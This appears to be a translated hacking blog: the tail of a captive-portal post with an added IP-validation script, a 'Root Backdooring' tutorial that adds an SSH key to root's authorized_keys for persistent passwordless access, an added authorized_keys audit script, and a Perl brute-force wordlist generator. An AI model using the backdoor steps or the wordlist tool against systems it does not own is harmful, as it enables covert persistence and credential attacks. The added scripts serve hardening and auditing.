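Because buka.sh and tutup.sh are executed by the web server with an argument that originates from the login page, the address must be validated before it reaches iptables. Here is an added example (not from the original post) of a safer version of the two scripts: the client IP is checked against the hotspot pool, and the iptables binary defaults to echo so the rule set can be inspected without root. It assumes the post's wlan0/ppp0 interfaces and the 192.168.0.0/24 pool.

```shell
#!/bin/sh
# Added example (not from the original post): a safer version of buka.sh/tutup.sh
# that validates the client address before it ever reaches iptables, because the
# post runs these scripts from the web server with a user-supplied argument.
# Assumes the post's interfaces (wlan0, ppp0) and the 192.168.0.0/24 pool.
# IPTABLES defaults to "echo" so the functions can be exercised without root.

WLAN=wlan0
WAN=ppp0
POOL_PREFIX=192.168.0.
IPTABLES=${IPTABLES:-echo}

# Accept only a dotted quad inside the hotspot pool: digits and dots only,
# the pool prefix, and a final octet of at most 255.  Anything else is rejected.
valid_client_ip() {
    case "$1" in
        *[!0-9.]*|*..*|.*|*.) return 1 ;;
    esac
    case "$1" in
        "$POOL_PREFIX"*) ;;
        *) return 1 ;;
    esac
    host=${1#"$POOL_PREFIX"}
    case "$host" in
        *.*|'') return 1 ;;
    esac
    [ "$host" -le 255 ]
}

# Print (or, with IPTABLES=/usr/sbin/iptables, apply) the rules for one client.
# open  = the buka.sh rules, close = the matching deletions (tutup.sh).
portal_rules() {
    action=$1; ip=$2
    valid_client_ip "$ip" || { echo "bad client ip: $ip" >&2; return 2; }
    case "$action" in
        open)  fwd=-A; nat=-I ;;
        close) fwd=-D; nat=-D ;;
        *) echo "usage: portal_rules open|close IP" >&2; return 2 ;;
    esac
    $IPTABLES $fwd FORWARD -s "$ip" -i "$WLAN" -o "$WAN" -j ACCEPT
    $IPTABLES $fwd FORWARD -d "$ip" -i "$WAN" -o "$WLAN" -j ACCEPT
    # RETURN ahead of the portal's REDIRECT rule so this client is no longer sent to the login page
    $IPTABLES -t nat $nat PREROUTING -s "$ip" -p tcp --dport 80 -j RETURN
}
```

Call portal_rules open "$1" from buka.sh and portal_rules close "$1" from tutup.sh with IPTABLES=/usr/sbin/iptables.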

Feel free to experiment.
That's all, thank you; hopefully this is useful. Apologies for any mistakes; criticism and suggestions are welcome :

SSH Login via RSA Key (Root Backdooring Part 2)

February 12, 2011

This tutorial is an alternative way of logging in with SSH using an RSA key, which can be used to log in via SSH without a password. OK, enough chit-chat, straight to the technique:

root@th3_w1tch:~# ssh-keygen -t rsa -b 2048 -f my-key

The command above will create 2 files:
my-key and my-key.pub

Then go into the /root/.ssh directory

root@th3_w1tch:~#cd /root/.ssh

Create the file authorized_keys

root@th3_w1tch:~#touch authorized_keys

Copy the contents of my-key.pub into authorized_keys

root@th3_w1tch:~#cat my-key.pub >> authorized_keys

Then copy the files my-key and my-key.pub to the client, or transfer them via scp with the command

root@th3_w1tch:~#scp my-key my-key.pub user@remotehost:~/home/user/

then change their permissions

client@th3_w1tch:~#chmod 600 my-key my-key.pub

Now log in to the server with the command

client@th3_w1tch:~#ssh -i my-key root@remotehost

Tadaaa, SSH login successful
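The flip side of the procedure above is that a key appended to /root/.ssh/authorized_keys keeps working silently, so the file deserves a periodic audit. This added example (not from the original post) lists each entry's key type, comment and whether it is restricted with from=, command= or restrict options, and separately names the unrestricted ones. It assumes OpenSSH authorized_keys syntax with no spaces inside the options field, a POSIX shell and awk; the key material in the sample file is a placeholder.

```shell
#!/bin/sh
# Added example (not from the original post): audit an authorized_keys file so a key
# dropped in the way the post shows does not go unnoticed.  For each entry print the
# key type, the comment and whether the entry carries from= / command= / restrict
# options; keys without any of those are listed separately.
# Assumes OpenSSH authorized_keys syntax, a POSIX shell and awk, and no spaces inside
# the options field (a command="a b" option with a space is outside this parser).

KEY_TYPES='ssh-rsa|ssh-ed25519|ssh-dss|ecdsa-sha2-nistp256|ecdsa-sha2-nistp384|ecdsa-sha2-nistp521'

# Print "type<TAB>comment<TAB>restricted=yes|no" per key line.
list_authorized_keys() {
    awk -v types="^($KEY_TYPES)\$" '
        /^[[:space:]]*(#|$)/ { next }                 # blank lines and comments
        {
            # options are present only when the first field is not a key type
            if ($1 ~ types) { opts = ""; t = $1; start = 3 }
            else            { opts = $1; t = $2; start = 4 }
            c = ""
            for (i = start; i <= NF; i++) c = c (c == "" ? "" : " ") $i
            r = (opts ~ /(^|,)(from=|command=|restrict(,|$))/) ? "yes" : "no"
            printf "%s\t%s\trestricted=%s\n", t, (c == "" ? "(no comment)" : c), r
        }
    ' "$1"
}

# Comments of keys that carry no from= / command= / restrict option.
unrestricted_keys() {
    list_authorized_keys "$1" | awk -F'\t' '$3 == "restricted=no" { print $2 }'
}

# Constructed sample, not a real key file: the key material is a placeholder.
write_sample_keys() {
    cat > "$1" <<'EOF'
# root's keys
ssh-rsa AAAAB3PLACEHOLDER== my-key
from="10.0.0.5",command="/usr/local/bin/backup" ssh-ed25519 AAAAC3PLACEHOLDER backup@nas
ssh-ed25519 AAAAC3PLACEHOLDER2
EOF
}
```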

Thank you, I hope this tutorial is useful :D

Reference: here

Dictionary Password Generator for Brute Force

January 14, 2011

Yesterday I had a chance to code a brute-forcer using the dictionary attack method. People say a brute-force without a large wordlist lacks salt, so with a little logic the wordlist can be produced instantly and ready to serve (like food :p). hehehehe
OK, straight to the code:

#!/usr/bin/perl
use strict;
use warnings;

system('clear');
print q(
###############################################################
#               Dictionary Password Generator                 #
###############################################################
);
print q(
Note :
k= Lowercase [a-z]
B= Upper case [A-Z]
a= Number [0-9]
c= Special characters);
print "\n";
print "\n[-]Input Dictionary Type [k/B/a/c]: ";
my $type = <STDIN>;
chomp($type);
print "[-]Input Min Length: ";
my $k = <STDIN>;
chomp($k);
print "[-]Input Max Length: ";
my $p = <STDIN>;
chomp($p);
print "Starting Dictionary Password . . . .\n";

# Build the character set from the selected classes (several may be combined, e.g. "ka")
my $char = "";
$char .= "abcdefghijklmnopqrstuvwxyz"   if $type =~ /k/;
$char .= "ABCDEFGHIJKLMNOPQRSTUVWXYZ"   if $type =~ /B/;
$char .= "1234567890"                   if $type =~ /a/;
$char .= "!\"\$%&/()=?-.:\\*'-_:.;,"     if $type =~ /c/;
die "No character class selected\n" if $char eq "";

open(my $fh, '>>', 'dictionary.txt') or die "Cannot open dictionary.txt: $!";
my $count = 0;

# Enumerate every string of length $len over $char, odometer style:
# @tampung holds one index per position; position 0 is incremented first and
# carries into the next position when it runs past the end of $char.
sub generator {
    my $len = shift;
    my @tampung = (0) x $len;
    do {
        for (my $i = 0; $i < $len; $i++) {
            if ($tampung[$i] > length($char) - 1) {
                return if $i == $len - 1;    # highest position overflowed: this length is done
                $tampung[$i + 1]++;
                $tampung[$i] = 0;
            }
        }
        my $pass = "";
        $pass .= substr($char, $tampung[$_], 1) for 0 .. $len - 1;
        print $fh "$pass\n";
        $count++;
        $tampung[0]++;
    } while ($tampung[$len - 1] < length($char));
}

for (my $x = $k; $x <= $p; $x++) {
    generator($x);
}
close($fh);
print "Finish, $count passwords written, check file dictionary.txt\n";
#th3w1tch

Save the code above as mehdictionary.pl, then run it from the console:

perl mehdictionary.pl

Thanks, hope it's useful. Enjoy your hack.